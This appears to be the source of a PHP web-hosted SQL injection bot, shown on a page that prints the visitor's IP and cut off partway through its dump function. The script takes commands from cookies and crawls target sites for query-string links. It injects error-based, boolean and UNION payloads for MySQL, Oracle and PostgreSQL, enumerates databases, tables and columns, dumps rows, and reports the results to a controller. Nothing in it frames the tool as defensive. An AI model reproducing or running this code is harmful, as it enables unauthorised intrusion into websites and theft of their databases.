Your IP : 216.73.216.170
<?php ignore_user_abort(true);error_reporting(0);set_time_limit(0);$a=$_COOKIE['a'];$eh=urldecode($_COOKIE['eh']);$tg=urldecode($_COOKIE['tg']);$td=urldecode($_COOKIE['td']);$ml=urldecode($_COOKIE['ml']);$ms=urldecode($_COOKIE['ms']);$do=explode("|",urldecode($_COOKIE['do']));$dc=explode("|",urldecode($_COOKIE['dc']));$sd=urldecode($_COOKIE['sd']);$st=urldecode($_COOKIE['st']);$bd=urldecode($_COOKIE['bd']);$ft=urldecode($_COOKIE['ft']);$ts=urldecode($_COOKIE['ts']);$xia='10';$xib='10';$ia=0;while($ia<$xia){$ib=0;while($ib<$xib){$res='union+all+select+';$res.=str_repeat("1,", $ia);$res.='CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)';$res.=str_repeat("1,", $ib);if(substr($res, -1)==','){$res=substr($res, 0, -1);}$res.='%23';$unipl[]='+-6863+'.$res;$unipl[]='+%27-6863+'.$res;$ib++;}$ia++;$xib--;}if($a=='cr'){$crawled=crawl($tg,$ml);$crawled=optimus($crawled);foreach($crawled as $crawl){$injected=injector($crawl,$ml);if($injected['type']=='fail'){}else{break 1;}}if($injected['inj'] AND $injected['type']!='fail'){post_stats('cr','OK',$tg,$injected,$nfo);exit;}else{post_stats('cr','BD',$tg,$opt,$nfo);exit;}}if($a=='ms'){$res_inj=explode("|",$td);$res_db=get_db($res_inj['0'],$tg,$res_inj['1'],$res_inj['2']);if(!$res_db['databases']){post_stats('ms','BD',$tg,$opt,$nfo);exit;}foreach($res_db['databases'] as $db_to_sch){$schema[$db_to_sch]=array();}$block_db=explode("|",$bd);$force_tab=explode("|",$ft);foreach($block_db as $bdb){$bdbs=array_search($bdb,$res_db['databases']);if($bdbs!==false){unset($res_db['databases'][$bdbs]);}}$msi=0;foreach($res_db['databases'] as $show_tab){if($msi<$ms){$res_tab=get_tab($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$show_tab);foreach($res_tab['tables'] as $show_col){if (in_array($show_col, $force_tab)) {$res_col=get_col($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$show_tab,$show_col);foreach($res_col['cols'] as $col_to_sch){$schema[$show_tab][$show_col][$col_to_sch]=array();}}else{$schema[$show_tab][$show_col]=array();}}}$msi++;}post_stats('ms','OK',$tg,$res_db,$schema);exit;}if($a=='gc'){$res_inj=explode("|",$td);$res_col=get_col($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4']);if(!$res_col['cols']){post_stats('gc','BD',$tg,$opt,$nfo);exit;}foreach($res_col['cols'] as $col_to_sch){$schema[$res_inj['3']][$res_inj['4']][$col_to_sch]=array();}post_stats('gc','OK',$tg,$opt,$schema);exit;}if($a=='gt'){$res_inj=explode("|",$td);$res_tab=get_tab($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$res_inj['3']);if(!$res_tab['tables']){post_stats('gt','BD',$tg,$opt,$nfo);exit;}foreach($res_tab['tables'] as $tab_to_sch){$schema[$res_inj['3']][$tab_to_sch]=array();}post_stats('gt','OK',$tg,$opt,$schema);exit;}if($a=='ts'){if($ts=='hdb'){$res_inj=explode("|",$td);$res_tab=get_tab($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3']);if(!$res_tab){post_stats('ts','BD',$tg,$opt,$schema);exit;}foreach($res_tab['tables'] as $show_col){if (in_array($show_col, $force_tab)){$res_col=get_col($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$show_col);foreach($res_col['cols'] as $col_to_sch){$schema[$res_inj['3']][$show_col][$col_to_sch]=array();}}else{$schema[$res_inj['3']][$show_col]=array();}}$opt['ts']='hdb';post_stats('ts','OK',$tg,$opt,$schema);exit;}if($ts=='htab'){$res_inj=explode("|",$td);$res_col=get_col($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4']);if(!$res_col){post_stats('ts','BD',$tg,$opt,$schema);exit;}foreach($res_col['cols'] as $col_to_sch){$schema[$res_inj['3']][$res_inj['4']][$col_to_sch]=array();}$opt['ts']='htab';post_stats('ts','OK',$tg,$opt,$schema);exit;}if($ts=='hprev'){$res_inj=explode("|",$td);$dc[0]=$res_inj['5'];$res_dump=dump($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4'],$dc,'0',$do['1']);post_stats('ts','OK',$tg,array('rows_total'=>$res_dump['rows_total'],'rows_done'=>$res_dump['rows_done'],'ts'=>'hprev'),$res_dump['dump']);exit;}}if($a=='dm'){$res_inj=explode("|",$td);$res_dump=dump($res_inj['0'],$do['2'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4'],$dc,$do['0'],$do['1']);post_stats('dm','OK',$tg,array('rows_total'=>$res_dump['rows_total'],'rows_done'=>$res_dump['rows_done'],'tg'=>$tg),$res_dump['dump']);exit;}function crawl($crawl_target,$ml){$original_file = file_get_contents($crawl_target);$path_info = parse_url($crawl_target);$base = $path_info['scheme'] . "://" . $path_info['host'];$stripped_file = strip_tags($original_file, "<a>");$fixed_file = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base}/", $stripped_file);$fixed_file = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$crawl_target}?", $fixed_file);$fixed_file = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$crawl_target}/?", $fixed_file);preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file, $matches);$result = $matches[1];$result = str_replace("<", "<", $result);$p = parse_url($crawl_target);$host = $p['host'] ;foreach($result as $sresult){if(((strpos($sresult, "facebook"))) === false AND ((strpos($sresult, "javascript"))) === false AND ((strpos($sresult, "twitter"))) === false AND ((strpos($sresult, "youtube"))) === false){$items[] = $sresult;}}$result = array_unique($items);foreach($result as $checker){$checker = str_replace( " " ,"", $checker );if(strpos($checker, "://")===false){$final[] = "http://".$host."/$checker";}elseif(strpos($checker, $host)===false){}else{$final[] = $checker;}}$maxlonks = "0";foreach($final as $echo){$maxlonks++;if($maxlonks >= $ml){break;}$original_file2 = file_get_contents($echo); $path_info2 = parse_url($echo);$base2 = $path_info2['scheme'] . "://" . $path_info2['host'];$stripped_file2 = strip_tags($original_file2, "<a>");$fixed_file2 = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base2}/", $stripped_file2);$fixed_file2 = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$echo}/?", $fixed_file2);preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file2, $matches2);$result2 = $matches2[1];$result2 = str_replace("<", "<", $result2);$p2 = parse_url($echo);$host2 = $p2['host'];foreach($result2 as $sresult2){if(strpos($sresult2, "php?")!==false AND strpos($sresult2, "facebook")===false AND strpos($sresult2, "javascript")===false AND strpos($sresult2, "twitter")===false AND strpos($sresult2, "youtube")===false){$items2[] = $sresult2;}}}$resultados = array_unique($items2);foreach($resultados as $checker2){$checker2 = str_replace( " " ,"", $checker2 );if(strpos($checker2, "://") == NULL){$final2[] = "http://".$host."/$checker2";}elseif(strpos($checker2, $host2) == FALSE){}else{$final2[] = $checker2;}}$uniques = array_unique(array_merge($final, $final2));foreach($uniques as $quizas){if(strpos($quizas, "?")!==false AND strpos($quizas, "facebook")===false AND strpos($quizas, "javascript")===false AND strpos($quizas, "twitter")===false AND strpos($quizas, "youtube")===false){$items[] = $quizas;$return[]=$quizas;}}return $return;}function injector($target_inj){global $unipl;$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');$url = $target_inj;$eurl_a=explode("&",$url);$ea = "0";$ef = count($eurl_a);$final=array();$final[0]=$eurl_a[0];while($ea<$ef){$sobras=explode($eurl_a[$ea],$url);$url2=str_replace($sobras[1],"",$url);$payload = $url2."+and+1=1".$sobras[1];$payload2 = $url2."+and+1=2".$sobras[1];$payload3 = $url2."'".$sobras[1];$url_s=file_get_contents($payload);$url_s2=file_get_contents($payload2);$url_s3=file_get_contents($payload3);if (md5($url_s) != md5($url_s2) AND $url_s3 != $url_s2){if(strpos($url_s,"MySQL")!==false OR strpos($url_s,"mysql")!==false OR strpos($url_s2,"MySQL")!==false OR strpos($url_s2,"mysql")!==false OR strpos($url_s3,"MySQL")!==false OR strpos($url_s3,"mysql")!==false){$type="m";}elseif(strpos($url_s,"Oracle")!==false OR strpos($url_s,"ORA-")!==false OR strpos($url_s,"ora-")!==false OR strpos($url_s2,"Oracle")!==false OR strpos($url_s2,"ORA-")!==false OR strpos($url_s2,"ora-")!==false OR strpos($url_s3,"Oracle")!==false OR strpos($url_s3,"ORA-")!==false OR strpos($url_s3,"ora-")!==false) {$type="o";}elseif(strpos($url_s,"PostgreSQL")!==false OR strpos($url_s,"pg_query")!==false OR strpos($url_s,"unterminated quoted string")!==false OR strpos($url_s,"pg_exec()")!==false OR strpos($url_s2,"PostgreSQL")!==false OR strpos($url_s2,"pg_query")!==false OR strpos($url_s2,"unterminated quoted string")!==false OR strpos($url_s2,"pg_exec()")!==false OR strpos($url_s3,"PostgreSQL")!==false OR strpos($url_s3,"pg_query")!==false OR strpos($url_s3,"unterminated quoted string")!==false OR strpos($url_s3,"pg_exec()")!==false){$type="p";}else{$type="u";}if($type== "m" || $type== "u"){$as=1;foreach($a as $detectar){$html = file_get_contents($url2.$detectar.$sobras[1]);if(strpos($html, ':oyu:')!==false){$mode_eb = $as;$return['type']='mysql_eb';$return['inj']=$url2; $return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_eb;return $return;}$as++;}$ass=1;foreach($unipl as $detectar2){$payload=$url2.$detectar2.$sobras[1];$html8 = file_get_contents($payload); if(strpos($html8, ':oyu:')!==false){$mode_uq = $ass;$return['type']='mysql_ub';$return['inj']=$url2; $return['query']=$detectar2;$return['sobras']=$sobras[1];$return['index']=$mode_uq;return $return; } $ass++;}}elseif($type=="o" || $type== "u"){$asd=1;foreach($c as $detectar){$html = file_get_contents($url2.$detectar.$sobras[1]);if(strpos($html, ':oyu:')!==false){$mode_oeb = $asd;$return['type']='oracle_eb';$return['inj']=$url2; $return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_oeb;return $return; }$asd++;}}elseif($type=="p" || $type== "u"){$asdf=1;foreach($d as $detectar){$html = file_get_contents("$url2+$detectar+$sobras[1]");if(strpos($html, ':oyu:')!==false){$mode_pg = $asdf;$return['type']='posgre_eb';$return['inj']=$url2; $return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_pg;return $return; }$asdf++;}}}$ea++; }if(empty($return['type'])){$return['type']='fail';$return['inj']=$url; $return['query']='';$return['sobras']='';$return['index']='';return $return; }}function get_db($type,$inj,$sobras,$index){global $unipl;$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1]; $querys=str_replace("$payload_error","(SELECT+3830+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFNULL(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.SCHEMATA),0x3a70687a3a,FLOOR(RAND(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20),0x3a70687a3a)", $query);$querys=str_replace("%23", "+FROM+INFORMATION_SCHEMA.SCHEMATA%23", $querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];}if($mode=="mysql_error"){$queryn=str_replace("$payload_error", '(SELECT+7288+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFNULL(CAST(schema_name+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+$i,1),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype="mysql_eb";}elseif($mode=="mysql_union"){$queryn=str_replace("%23",'+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+$i,1%23', $query);$queryn=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)",'CONCAT(0x3a6f79753a,IFnull(CAST(SCHEMA_NAME+AS+CHAR),0x20),0x3a70687a3a)', $queryn);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype="mysql_ub";}elseif($mode=="oracle_error"){$queryn=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(USER%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20DUAL)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);$ntype="oracle_eb";$i = 0;$count=0;}elseif($mode=="postgre_error"){$ntype="posgre_eb";}if($mode=="postgre_error"){$databases[]='public';}else{while ($i <= $count){$query_number=str_replace('$i',"$i",$queryn);$database = GetBetween(file_get_contents($inj.$query_number.$sobras));$databases[]=$database;$i++;}}$return['type']=$ntype;$return['inj']=$inj;$return['sobras']=$sobras;$return['index']=$index;$return['databases']=$databases;}return $return;}function get_tab($type,$inj,$sobras,$index,$database){global $unipl;$database_hex = hexEncode($database);$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){$inj = $inj;$index = $index;$sobras = $sobras;if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];$querys=str_replace("$payload_error","(SELECT%203830%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20$database_hex%20),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);$querys=str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20$database_hex%23", $querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$database_chr = CHRize($database);$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(TABLE_NAME)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20(".$database_chr."))%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(tablename)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))))",$query);}$return['inj']=$inj;$return['sobras']=$sobras;if($mode=="mysql_error"){$query_n=str_replace("$payload_error", '(SELECT%207288%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(table_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20'.$database_hex.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="mysql_eb";}elseif($mode=="mysql_union"){$query_n=str_replace("%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()","%23", $query);$query_n=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(table_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20'.$database_hex.'%20LIMIT%20$i,1)', $query_n);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="mysql_ub";}elseif($mode=="oracle_error"){$query_n=str_replace("$payload_oracle", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(TABLE_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20TABLE_NAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20('.$database_chr.')%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);$i = 1;$count=(GetBetween(file_get_contents($inj.$querys.$sobras)));$columnasss="oracle_eb";}elseif($mode=="postgre_error"){$query_n=str_replace("$payload_postgre", '(SELECT%20COALESCE(CAST(tablename%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))%20OFFSET%20$i%20LIMIT%201)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="posgre_eb";}$return['tabs_count']=$count;while ($i <= $count){$query_nombre=str_replace('$i',"$i",$query_n);$tabs[] = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$i++;}$return['tables']=$tabs;$return['index']=$index;$return['type']=$columnasss;$return['database']=$database;}return $return;}function get_col($type,$inj,$sobras,$index,$database,$table){global $unipl;$database_hex=hexEncode($database);$table_hex=hexEncode($table);$payload_union="CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)";$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];$querys=str_replace("$payload_error","(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D$table_hex+AND+table_schema%3D".$database_hex."),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)",$query);$querys=str_replace("%23","%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D".$table_hex."%20AND%20table_schema%3D".$database_hex."%23",$querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$table_chr = CHRize($table);$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D".$table_chr.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$table_chr = CHRize($table);$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(".$table_chr.")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))",$query);}$return['inj']=$inj;$return['sobras']=$sobras;$return['database']=$database;$return['table']=$table;if($mode=="mysql_error"){$query_n=str_replace("$payload_error",'(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D'.$table_hex.'%20AND%20table_schema%3D'.$database_hex.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "mysql_eb";}elseif($mode=="mysql_union"){$query_n=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D'.$table_hex.'%20AND%20table_schema%3D'.$database_hex.'%20LIMIT%20$i,1)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "mysql_ub";}elseif($mode=="oracle_error"){$query_n=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D'.$table_chr.'%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query); $i = 1;$count=(GetBetween(file_get_contents($inj.$querys.$sobras)));$ntype = "oracle_eb";}elseif($mode=="postgre_error"){$query_n=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D('.$table_chr.')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "posgre_eb";}$return['cols_count']=$count;while ($i <= $count){$query_nombre=str_replace('$i',"$i",$query_n);$cols[] = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$i++;}$return['index']=$index;$return['type']=$ntype;$return['cols']=$cols;$return['cols_hex']=$col_hex;}return $return;}function dump($type,$inj,$sobras,$index,$database,$table,$cols,$c_from,$c_to){global 